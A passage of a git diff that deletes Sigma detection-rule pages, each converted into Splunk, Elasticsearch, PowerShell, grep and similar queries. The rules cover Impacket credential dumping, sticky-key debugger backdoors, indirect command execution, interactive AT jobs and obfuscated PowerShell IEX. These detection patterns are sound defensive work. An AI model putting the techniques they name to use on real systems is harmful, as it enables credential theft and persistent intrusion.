-((ParentImage.keyword:(*\\wmiprvse.exe *\\mmc.exe *\\explorer.exe *\\services.exe) AND CommandLine.keyword:(*cmd.exe* \/Q \/c * \\\\127.0.0.1\\*&1*)) OR (ParentCommandLine.keyword:(*svchost.exe \-k netsvcs taskeng.exe*) AND CommandLine.keyword:(cmd.exe \/C *Windows\\Temp\\*&1)))
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*\\wmiprvse.exe" OR ParentImage="*\\mmc.exe" OR ParentImage="*\\explorer.exe" OR ParentImage="*\\services.exe") (CommandLine="*cmd.exe* /Q /c * \\\\127.0.0.1\\*&1*")) OR ((ParentCommandLine="*svchost.exe -k netsvcs" OR ParentCommandLine="taskeng.exe*") (CommandLine="cmd.exe /C *Windows\\Temp\\*&1"))) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((ParentImage IN ["*\\wmiprvse.exe", "*\\mmc.exe", "*\\explorer.exe", "*\\services.exe"] CommandLine IN ["*cmd.exe* /Q /c * \\\\127.0.0.1\\*&1*"]) OR (ParentCommandLine IN ["*svchost.exe -k netsvcs", "taskeng.exe*"] CommandLine IN ["cmd.exe /C *Windows\\Temp\\*&1"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\wmiprvse\.exe|.*.*\mmc\.exe|.*.*\explorer\.exe|.*.*\services\.exe))(?=.*(?:.*.*cmd\.exe.* /Q /c .* \\\\127\.0\.0\.1\\.*&1.*)))|.*(?:.*(?=.*(?:.*.*svchost\.exe -k netsvcs|.*taskeng\.exe.*))(?=.*(?:.*cmd\.exe /C .*Windows\\Temp\\.*&1)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_impacket_secretdump.md b/Atomic_Threat_Coverage/Detection_Rules/win_impacket_secretdump.md
deleted file mode 100644
index 8819c57..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_impacket_secretdump.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Possible Impacket SecretDump Remote Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detect AD credential dumping using impacket secretdump HKTL |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>pentesting</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html](https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.004</li><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Impacket SecretDump Remote Activity
-id: 252902e3-5830-4cf6-bf21-c22083dfd5cf
-description: Detect AD credential dumping using impacket secretdump HKTL
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.004
-    - attack.t1003.003
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection:
-        EventID: 5145
-        ShareName: \\*\ADMIN$
-        RelativeTargetName: 'SYSTEM32\\*.tmp'
-    condition: selection
-falsepositives:
-    - pentesting
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\ADMIN$" -and $_.message -match "RelativeTargetName.*SYSTEM32\\.*.tmp") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\ADMIN$ AND RelativeTargetName.keyword:SYSTEM32\\*.tmp)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/252902e3-5830-4cf6-bf21-c22083dfd5cf <<EOF
-{
-  "metadata": {
-    "title": "Possible Impacket SecretDump Remote Activity",
-    "description": "Detect AD credential dumping using impacket secretdump HKTL",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.004",
-      "attack.t1003.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\ADMIN$ AND RelativeTargetName.keyword:SYSTEM32\\\\*.tmp)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\ADMIN$ AND RelativeTargetName.keyword:SYSTEM32\\\\*.tmp)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Impacket SecretDump Remote Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND ShareName.keyword:\\*\\ADMIN$ AND RelativeTargetName.keyword:SYSTEM32\\*.tmp)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" ShareName="\\*\\ADMIN$" RelativeTargetName="SYSTEM32\\*.tmp")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" ShareName="\\*\\ADMIN$" RelativeTargetName="SYSTEM32\\*.tmp")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*\\.*\ADMIN\$)(?=.*SYSTEM32\\.*\.tmp))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_indirect_cmd.md b/Atomic_Threat_Coverage/Detection_Rules/win_indirect_cmd.md
deleted file mode 100644
index 6338df7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_indirect_cmd.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Indirect Command Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detect indirect command execution via Program Compatibility Assistant pcalua.exe or forfiles.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts</li><li>Legit usage of scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html](https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Indirect Command Execution
-id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
-description: Detect indirect command execution via Program Compatibility Assistant pcalua.exe or forfiles.exe
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
-date: 2019/10/24
-modified: 2019/11/11
-tags:
-    - attack.defense_evasion
-    - attack.t1202
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith:
-            - '\pcalua.exe'
-            - '\forfiles.exe'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - ParentCommandLine
-    - CommandLine
-falsepositives:
-    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
-    - Legit usage of scripts
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\pcalua.exe" -or $_.message -match "ParentImage.*.*\\forfiles.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.ParentImage.keyword:(*\\pcalua.exe OR *\\forfiles.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fa47597e-90e9-41cd-ab72-c3b74cfb0d02 <<EOF
-{
-  "metadata": {
-    "title": "Indirect Command Execution",
-    "description": "Detect indirect command execution via Program Compatibility Assistant pcalua.exe or forfiles.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1202"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:(*\\\\pcalua.exe OR *\\\\forfiles.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:(*\\\\pcalua.exe OR *\\\\forfiles.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Indirect Command Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\n             User = {{_source.User}}\nParentCommandLine = {{_source.ParentCommandLine}}\n      CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ParentImage.keyword:(*\\pcalua.exe *\\forfiles.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\pcalua.exe" OR ParentImage="*\\forfiles.exe") | table ComputerName,User,ParentCommandLine,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\pcalua.exe", "*\\forfiles.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\pcalua\.exe|.*.*\forfiles\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_install_reg_debugger_backdoor.md b/Atomic_Threat_Coverage/Detection_Rules/win_install_reg_debugger_backdoor.md
deleted file mode 100644
index 2aabb9a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_install_reg_debugger_backdoor.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Suspicious Debugger Registration Cmdline       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1015: Accessibility Features](https://attack.mitre.org/techniques/T1015)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration Tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/](https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1546.008</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Debugger Registration Cmdline
-id: ae215552-081e-44c7-805f-be16f975c8a2
-status: experimental
-description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-references:
-    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1015
-    - attack.t1546.008
-author: Florian Roth
-date: 2019/09/06
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\CurrentVersion\Image File Execution Options\sethc.exe*'
-            - '*\CurrentVersion\Image File Execution Options\utilman.exe*'
-            - '*\CurrentVersion\Image File Execution Options\osk.exe*'
-            - '*\CurrentVersion\Image File Execution Options\magnify.exe*'
-            - '*\CurrentVersion\Image File Execution Options\narrator.exe*'
-            - '*\CurrentVersion\Image File Execution Options\displayswitch.exe*'
-            - '*\CurrentVersion\Image File Execution Options\atbroker.exe*'
-    condition: selection
-falsepositives:
-    - Penetration Tests
-level: high
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\sethc.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\utilman.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\osk.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\magnify.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\narrator.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\displayswitch.exe.*" -or $_.message -match "CommandLine.*.*\\CurrentVersion\\Image File Execution Options\\atbroker.exe.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\CurrentVersion\\Image\ File\ Execution\ Options\\sethc.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\utilman.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\osk.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\magnify.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\narrator.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\displayswitch.exe* OR *\\CurrentVersion\\Image\ File\ Execution\ Options\\atbroker.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ae215552-081e-44c7-805f-be16f975c8a2 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Debugger Registration Cmdline",
-    "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1015",
-      "attack.t1546.008"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\sethc.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\utilman.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\osk.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\magnify.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\narrator.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\displayswitch.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\atbroker.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\sethc.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\utilman.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\osk.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\magnify.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\narrator.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\displayswitch.exe* OR *\\\\CurrentVersion\\\\Image\\ File\\ Execution\\ Options\\\\atbroker.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Debugger Registration Cmdline'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\CurrentVersion\\Image File Execution Options\\sethc.exe* *\\CurrentVersion\\Image File Execution Options\\utilman.exe* *\\CurrentVersion\\Image File Execution Options\\osk.exe* *\\CurrentVersion\\Image File Execution Options\\magnify.exe* *\\CurrentVersion\\Image File Execution Options\\narrator.exe* *\\CurrentVersion\\Image File Execution Options\\displayswitch.exe* *\\CurrentVersion\\Image File Execution Options\\atbroker.exe*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\CurrentVersion\\Image File Execution Options\\sethc.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\utilman.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\osk.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\magnify.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\narrator.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\displayswitch.exe*" OR CommandLine="*\\CurrentVersion\\Image File Execution Options\\atbroker.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\CurrentVersion\\Image File Execution Options\\sethc.exe*", "*\\CurrentVersion\\Image File Execution Options\\utilman.exe*", "*\\CurrentVersion\\Image File Execution Options\\osk.exe*", "*\\CurrentVersion\\Image File Execution Options\\magnify.exe*", "*\\CurrentVersion\\Image File Execution Options\\narrator.exe*", "*\\CurrentVersion\\Image File Execution Options\\displayswitch.exe*", "*\\CurrentVersion\\Image File Execution Options\\atbroker.exe*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\CurrentVersion\Image File Execution Options\sethc\.exe.*|.*.*\CurrentVersion\Image File Execution Options\utilman\.exe.*|.*.*\CurrentVersion\Image File Execution Options\osk\.exe.*|.*.*\CurrentVersion\Image File Execution Options\magnify\.exe.*|.*.*\CurrentVersion\Image File Execution Options\narrator\.exe.*|.*.*\CurrentVersion\Image File Execution Options\displayswitch\.exe.*|.*.*\CurrentVersion\Image File Execution Options\atbroker\.exe.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_interactive_at.md b/Atomic_Threat_Coverage/Detection_Rules/win_interactive_at.md
deleted file mode 100644
index 259a05e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_interactive_at.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Interactive AT Job       |
-|:-------------------------|:------------------|
-| **Description**          | Detect an interactive AT job, which may be used as a form of privilege escalation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely (at.exe deprecated as of Windows 8)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html](https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-| Other Tags           | <ul><li>attack.t1053.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Interactive AT Job
-id: 60fc936d-2eb0-4543-8a13-911c750a1dfc
-description: Detect an interactive AT job, which may be used as a form of privilege escalation
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html
-date: 2019/10/24
-modified: 2019/11/11
-tags:
-    - attack.privilege_escalation
-    - attack.t1053
-    - attack.t1053.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\at.exe'
-        CommandLine|contains: 'interactive'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unlikely (at.exe deprecated as of Windows 8)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\at.exe" -and $_.message -match "CommandLine.*.*interactive.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\at.exe AND winlog.event_data.CommandLine.keyword:*interactive*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/60fc936d-2eb0-4543-8a13-911c750a1dfc <<EOF
-{
-  "metadata": {
-    "title": "Interactive AT Job",
-    "description": "Detect an interactive AT job, which may be used as a form of privilege escalation",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1053",
-      "attack.t1053.002"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\at.exe AND winlog.event_data.CommandLine.keyword:*interactive*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\at.exe AND winlog.event_data.CommandLine.keyword:*interactive*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Interactive AT Job'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\at.exe AND CommandLine.keyword:*interactive*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\at.exe" CommandLine="*interactive*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\at.exe" CommandLine="*interactive*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\at\.exe)(?=.*.*interactive.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_commandline.md b/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_commandline.md
deleted file mode 100644
index b6bf1c6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_commandline.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Invoke-Obfuscation Obfuscated IEX Invocation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block — https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniel Bohannon (@Mandiant/@FireEye), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Invoke-Obfuscation Obfuscated IEX Invocation
-id: 4bf943c6-5146-4273-98dd-e958fd1e3abf
-description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888"
-status: experimental
-author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-date: 2019/11/08
-tags:
-    - attack.defense_evasion
-    - attack.t1027
-logsource:
-    category: process_creation
-    product: windows
-detection:
